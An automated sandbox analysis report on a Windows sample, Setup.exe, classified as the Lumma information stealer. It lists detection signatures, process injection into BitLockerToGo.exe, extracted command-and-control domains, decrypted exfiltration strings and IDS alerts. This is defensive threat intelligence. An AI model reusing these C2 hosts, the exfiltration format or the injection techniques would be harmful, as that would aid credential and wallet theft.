Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1532358
MD5:05443b11c90686db9e945c7b5db2083f
SHA1:4d06a81a31d2a24acf23aebc669e36ab43198c83
SHA256:941bc1cae6bd0f033e560e2312324653586dbe7d84bb231e89c479501ab3419d
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 05443B11C90686DB9E945C7B5DB2083F)
    • BitLockerToGo.exe (PID: 3784 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["condifendteu.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "divewanntwj.biz", "drawwyobstacw.sbs", "enlargkiw.sbs", "resinedyw.sbs", "mathcucom.sbs"], "Build id": "k99eRC--davi"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
  • 0x0:$x1: 4d5a9000030000000
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:19.559555+020020546531A Network Trojan was detected192.168.2.649763188.114.97.3443TCP
    2024-10-13T01:43:20.532951+020020546531A Network Trojan was detected192.168.2.649774188.114.97.3443TCP
    2024-10-13T01:43:21.763103+020020546531A Network Trojan was detected192.168.2.649780104.21.33.249443TCP
    2024-10-13T01:43:22.729015+020020546531A Network Trojan was detected192.168.2.649790104.21.77.78443TCP
    2024-10-13T01:43:23.697513+020020546531A Network Trojan was detected192.168.2.649799172.67.140.193443TCP
    2024-10-13T01:43:24.691670+020020546531A Network Trojan was detected192.168.2.649806172.67.173.224443TCP
    2024-10-13T01:43:25.704366+020020546531A Network Trojan was detected192.168.2.649813104.21.79.35443TCP
    2024-10-13T01:43:27.364361+020020546531A Network Trojan was detected192.168.2.649819188.114.96.3443TCP
    2024-10-13T01:43:29.470690+020020546531A Network Trojan was detected192.168.2.649837172.67.206.204443TCP
    2024-10-13T01:43:30.773465+020020546531A Network Trojan was detected192.168.2.649843172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:19.559555+020020498361A Network Trojan was detected192.168.2.649763188.114.97.3443TCP
    2024-10-13T01:43:20.532951+020020498361A Network Trojan was detected192.168.2.649774188.114.97.3443TCP
    2024-10-13T01:43:21.763103+020020498361A Network Trojan was detected192.168.2.649780104.21.33.249443TCP
    2024-10-13T01:43:22.729015+020020498361A Network Trojan was detected192.168.2.649790104.21.77.78443TCP
    2024-10-13T01:43:23.697513+020020498361A Network Trojan was detected192.168.2.649799172.67.140.193443TCP
    2024-10-13T01:43:24.691670+020020498361A Network Trojan was detected192.168.2.649806172.67.173.224443TCP
    2024-10-13T01:43:25.704366+020020498361A Network Trojan was detected192.168.2.649813104.21.79.35443TCP
    2024-10-13T01:43:27.364361+020020498361A Network Trojan was detected192.168.2.649819188.114.96.3443TCP
    2024-10-13T01:43:29.470690+020020498361A Network Trojan was detected192.168.2.649837172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:30.773465+020020498121A Network Trojan was detected192.168.2.649843172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:25.212994+020020565591Domain Observed Used for C2 Detected192.168.2.649813104.21.79.35443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:26.203356+020020565571Domain Observed Used for C2 Detected192.168.2.649819188.114.96.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:24.244298+020020565611Domain Observed Used for C2 Detected192.168.2.649806172.67.173.224443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:21.104176+020020565671Domain Observed Used for C2 Detected192.168.2.649780104.21.33.249443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:20.068526+020020565711Domain Observed Used for C2 Detected192.168.2.649774188.114.97.3443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:22.294217+020020565651Domain Observed Used for C2 Detected192.168.2.649790104.21.77.78443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:23.264268+020020565631Domain Observed Used for C2 Detected192.168.2.649799172.67.140.193443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:20.535905+020020565681Domain Observed Used for C2 Detected192.168.2.6567761.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:24.703292+020020565581Domain Observed Used for C2 Detected192.168.2.6540191.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:25.707038+020020565561Domain Observed Used for C2 Detected192.168.2.6544661.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:23.699707+020020565601Domain Observed Used for C2 Detected192.168.2.6638621.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:20.583271+020020565661Domain Observed Used for C2 Detected192.168.2.6551861.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:19.566415+020020565701Domain Observed Used for C2 Detected192.168.2.6652051.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:21.793998+020020565641Domain Observed Used for C2 Detected192.168.2.6633461.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:22.766633+020020565621Domain Observed Used for C2 Detected192.168.2.6527251.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-13T01:43:28.675668+020028586661Domain Observed Used for C2 Detected192.168.2.649826104.102.49.254443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Found malware configuration
    Source: 2.2.BitLockerToGo.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["condifendteu.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "divewanntwj.biz", "drawwyobstacw.sbs", "enlargkiw.sbs", "resinedyw.sbs", "mathcucom.sbs"], "Build id": "k99eRC--davi"}
    Multi AV Scanner detection for submitted file
    Source: Setup.exeReversingLabs: Detection: 15%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: condifendteu.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: vennurviot.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: resinedyw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: allocatinow.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: mathcucom.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: divewanntwj.biz
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: drawwyobstacw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: condifendteu.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: ehticsprocw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: vennurviot.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: resinedyw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: enlargkiw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: allocatinow.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: mathcucom.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: divewanntwj.biz
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmpString decryptor: k99eRC--davi
    Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49763 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49774 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49780 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49799 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49813 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49819 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49826 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49837 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49843 version: TLS 1.2
    Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_004438E4
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh]2_2_004439B5
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h]2_2_0043CCC5
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp edi2_2_00443D4F
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh]2_2_0040CE60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h2_2_0042E049
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edi, dword ptr [esp+04h]2_2_0042E049
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov esi, dword ptr [esp+18h]2_2_00401000
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh]2_2_0040F0C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push eax2_2_004430D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0042E0D7
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h2_2_004410E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h]2_2_004410E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h]2_2_004320A3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl2_2_00430120
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_00430120
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp], 00000000h2_2_0041E180
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push 2CCA4B49h2_2_0040E244
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], dx2_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, ebx2_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax-17h]2_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0042C2EE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042F2F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h2_2_004452A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_004452A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00427350
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx2_2_00429370
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, dword ptr [esp+38h]2_2_00429370
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h2_2_004463E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h2_2_004453F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_004453F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ebx+eax], 00000000h2_2_0041E4E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h2_2_0042B500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h2_2_0042B500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx2_2_00429500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h]2_2_0042D530
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h2_2_004405F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h2_2_004455B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_004455B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_0041E670
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]2_2_004056F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h2_2_00440750
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ecx2_2_00410772
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h2_2_00445700
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00445700
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_0042E7C2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx2_2_004207E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h2_2_004457F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_004457F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx]2_2_0040F819
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ebx2_2_0040F819
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+14h]2_2_0040D8C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+04h]2_2_0040D8C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh]2_2_0042B8F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004398F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp eax2_2_004108A8
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0042F900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push esi2_2_0042C913
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]2_2_00432992
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+74h]2_2_00432992
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h2_2_00421A60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h2_2_00440AA0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [edi+ecx], 00000000h2_2_00445B20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00445B20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [0044EF6Ch]2_2_0042CBDC
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]2_2_00406B90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_0042CC28
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h2_2_00446C30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h]2_2_00440CC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh2_2_00440CC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea eax, dword ptr [esp+48h]2_2_0042AD00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx2_2_00445E70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]2_2_0043EE00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh2_2_0041EE2E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_0041EE2E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h2_2_0041EE2E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh2_2_00446F00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebp, word ptr [eax]2_2_00446F00

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.6:49780 -> 104.21.33.249:443
    Source: Network trafficSuricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.6:49790 -> 104.21.77.78:443
    Source: Network trafficSuricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.6:49774 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.6:65205 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.6:63862 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.6:49806 -> 172.67.173.224:443
    Source: Network trafficSuricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.6:63346 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.6:49813 -> 104.21.79.35:443
    Source: Network trafficSuricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.6:55186 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.6:54466 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.6:56776 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.6:52725 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.6:54019 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.6:49819 -> 188.114.96.3:443
    Source: Network trafficSuricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.6:49799 -> 172.67.140.193:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49763 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49763 -> 188.114.97.3:443
